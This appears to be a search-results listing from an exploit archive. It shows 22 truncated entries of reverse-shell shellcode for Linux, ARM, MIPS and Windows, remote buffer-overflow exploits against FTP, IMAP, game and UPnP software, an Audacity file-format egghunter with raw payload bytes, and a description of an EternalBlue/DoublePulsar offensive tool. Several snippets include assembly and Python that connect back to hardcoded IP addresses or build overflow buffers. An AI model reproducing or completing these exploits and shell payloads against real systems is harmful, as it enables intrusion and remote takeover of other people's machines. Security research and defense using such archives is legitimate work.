22 matches found
Exploit for CVE-2017-0144
This repository is an offensive tool for Windows. It is an implementation of the DoublePulsar backdoor in C/C++. The tool includes a suite of exploits and detectors for various vulnerabilities, including the EternalBlue vulnerability CVE-2017-0144. The tool can be used to upload a DLL to a...
Linux/MIPS - N32 MSB Reverse Shell Shellcode
/ mipsn32msblinuxrevsh.c - MIPS N32 MSB Linux reverse Copyright c 2022 Marco Ivaldi Basic MIPS N32 MSB Linux reverse shellcode, showcasing various techniques to avoid badchars. Cross-compile https://buildroot.org/ with: $ mips64-linux-gcc -static mipsn32msblinuxrevsh.c -o revsh Tested on Linux...
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode 91 bytes Author: bolonobolo Tested on: Linux x86 Software: N/A CVE: N/A / global start section .text start: ;socket xor ecx, ecx ; xoring ECX xor ebx, ebx ; xoring EBX mul ebx ; xoring EAX and EDX inc cl ; ECX should be 1...
Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)
/ Title: Linux/ARM - IPv6 ::1 4444/TCP Reverse Shellcode 116 Bytes Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.34-v7+ 1110 SMP Mon Apr 16 15:18:51 BST 2018 armv7l GNU/Linux pi@raspberrypi: $ lsbrelease -a No LSB modules are...
Linux/x86 - Reverse UDP Shellcode (668 bytes)
Linux/x86 - Reverse UDP Shellcode 668 bytes. Shellcode exploit for Linx86 platform ; SLAE-X ; thanks to writesup from previou students : ; assignment: 2. create a reverse shell ; originality: using UDP instead TCP ; usage : sudo ncat -lup 53 on the receiving end ; warning, this shellcode might...
Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)
BITS 64 ; reverse ip6 tcp shell ; size = 113 bytes depends of ip addr, default is ::1 ; nullbytes free depends only on ip addr, ; you could always and the ip add to remove ; the nulls like i did with the port ; it sleeps and then tries to recconect default 3 seconds ; ;shell =...
Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)
Linux/x86-64 - Reverse Shell Shellcode IPv6 113 bytes. Shellcode exploit for Linx86-64 platform BITS 64 ; reverse ip6 tcp shell ; size = 113 bytes depends of ip addr, default is ::1 ; nullbytes free depends only on ip addr, ; you could always and the ip add to remove ; the nulls like i did with t...
Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)
/ ; File name: reversebash.nasm ; Author: Jasmin Landry @JR0ch17 ; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119 ; To change ; Shellcode length: 110 bytes ; Tested on Ubuntu 12.04.5 32-bit x86 ; Assemble reversebash.nasm file: nasm -f elf32 -o...
Linux/x86-64 - Reverse Shell Shellcode (84 bytes)
/ Title: Linux/x86-64 - Reverse TCP shellcode - 84 bytes Author: Manuel Mancera @sinkmanu Tested on: 3.16.0-4-amd64 1 SMP Debian 3.16.39-1 2016-12-30 x8664 GNU/Linux ----------------- Assembly code ------------------- section .text global start start: push 0x2d01a8c0 ; Address 192.168.1.45 push...
Linux/x86 - TCP Reverse Shellcode (75 bytes)
/ Linux x86 TCP Reverse Shellcode 75 bytes Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 75 SLAE - 750 ------------c prog ---poc by sajith shetty---------- include include include include int mainvoid int sockfiledes; struct sockaddrin sockad; //1 create socket connection //Man page:...
Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)
/ Title : Linux x8664 reverse tcp ipv6 Date : 04-05-2016 Author : Roziul Hasan Khan Shifat Tested on : Ubuntu 14.04 LTS x8664 / / Disassembly of section .text: 0000000000400080 : 400080: 48 31 c0 xor rax,rax 400083: 6a 06 push 0x6 400085: 6a 01 push 0x1 400087: 6a 0a push 0xa 400089: 5f pop rdi...
MiniUPnP igd_desc_parse. c buffer overflow
No description provided by source. TALOS-CAN-0035 CVE 2015-6031 exploit by Aleksandar Nikolic illustrating the SSP bypass with a stack buffer overflow in an application that uses pthreads. import socket import struct SSDP reply to MSEARCH request, specifies the location URL reply = """HTTP/1.1 20...
Windows 9x/NT/2k/XP Reverse Generic Shellcode without Loader 249 bytes
No description provided by source. We use the PEB for the Output/Input/Error Handles. typedef struct PEB BOOLEAN InheritedAddressSpace ; BOOLEAN ReadImageFileExecOptions ; BOOLEAN BeingDebugged ; BOOLEAN Spare ; HANDLE Mutant ; PVOID ImageBaseAddress ; PPEB LDR DATA LoaderData ; PRTL USER PROCESS...
Audacity 1.2 - .gro Universal Buffer Overflow (Egghunter)
Audacity 1.2 - .gro Universal Buffer Overflow Egghunter !/usr/bin/env python Audacity print " + Creating eviL .gro file..." buff = "\x44" 174 buff += "\xEB\x08\x90\x90" buff += "\x22\x23\x17\x01" buff += "\x90" 4 buff += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"...
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
!/usr/bin/env python Audacity print " + Creating eviL .gro file..." buff = "\x44" 174 buff += "\xEB\x08\x90\x90" buff += "\x22\x23\x17\x01" buff += "\x90" 4 buff += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x57\x30\x30\x54" this is the egg...
WS_FTP LE 5.08 (PASV response) Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ============================================================= WSFTP LE 5.08 PASV response Remote Buffer Overflow Exploit ============================================================= / wsexp.c WSFTP LE 5.08 PASV response 0day buffer overflo...
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
/ wftpdexp.c WFTPD server 3.23 SIZE 0day remote buffer overflow exploit coded by h07 tested on XP SP2 polish, 2000 SP4 polish example.. C:\wftpdexp 0 0 192.168.0.2 h07 open 192.168.0.1 4444 WFTPD server 3.23 SIZE 0day remote buffer overflow exploit coded by h07 FTP response: 331 Give me your...
windows 9x/NT/2k/XP Reverse Generic Shellcode w/o Loader 249 bytes
Exploit for win32 platform in category shellcode ================================================================== Windows 9x/NT/2k/XP Reverse Generic Shellcode w/o Loader 249 bytes ================================================================== We use the PEB for the Output/Input/Error...
Yager 5.24 - Remote Buffer Overflow
Yager 5.24 - Remote Buffer Overflow / Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... --...
MailEnable Enterprise 1.x Imapd Remote Exploit
No description provided by source. / +--=--------------------------x0n3-h4ck Team Presents---------------------------=--+ +--= =--+ +--= MailEnable Enterprise = 1.04Professional = 1.54 remote Imapd exploit =--+ +--= =--+ +--= Bug discovered by..: Corryl [email protected] =--+ +--= Exploit coded...